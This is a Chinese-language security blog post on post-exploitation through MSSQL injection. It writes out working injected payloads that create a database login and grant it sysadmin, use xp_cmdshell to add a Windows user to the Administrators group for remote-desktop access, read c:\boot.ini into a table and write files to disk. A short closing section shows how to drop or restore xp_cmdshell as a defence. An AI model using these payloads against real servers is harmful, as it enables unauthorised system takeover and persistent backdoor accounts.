这篇文章,将介绍一些MSSQL注入中更加高级的玩法。既然我们已经是数据库的最高管理员权限了,那么自然我们能做的事就非常的多了。
一. 数据库用户的提权
1.建立数据库用户:
通过数据库的?sp_addlogin 扩展来添加用户。
;exec master..sp_addlogin secist,888888;–
2.把secist用户加入到sysadmin:
通过数据库的?sp_addsrvrolemember 扩展来将普通用户添加到管理员组。
;exec master..sp_addsrvrolemember secist,sysadmin;–
3.利用漏洞:
利用数据库连接器:查询分析器—文件–连接:数据库服务器 例如:ip:192.168.2.8 用户名:secist 密码:888888 。这样我们就可以通过图形界面进行各操作!
二.?操作系统的提权
1.建立系统用户:
通过数据库的 xp_cmdshell 扩展来添加用户。
;exec master..xp_cmdshell ‘net user secist 88888 /add’–
2.提权:把secist加入administrators组:
;exec master..xp_cmdshell ‘net localgroup administrators secist /add’–
3.利用:
远程桌面:3389 ,mstsc.exe 。
三. 读系统写文件
1.利用查询分析器连接数据库:secist,888888
2.create table vvboot(line varchar(8000))
3.bulk insert vvboot from ‘c:\boot.ini’
4.select * from vvboot
四. 向系统写文件
;exec master..xp_cmdshell ‘echo aaa >>c:u.txt’–
五. 防xp_cmdshell,xplog70.dll
如果想防止攻击者利用?xp_cmdshell 来调用系统命令,我们可以通过命令来删除该扩展。从而达到使攻击者,无法正常进行调用的目的。
1.删除:
;exec master..sp_dropextendedproc ‘xp_cmdshell’
2.恢复:
;exec master..sp_addextendedproc ‘xp_cmdshell’,’xplog70.dll’
3.终极防:xp_cmdshell,防未公布溢出漏洞:
c:\windows\system32\cmd.exe
删除所有权限,添加 administrator 完全控制。
原创文章,转载请注明来源 即刻安全 !
转载请注明:即刻安全 » MSSQL手工注入之高级应用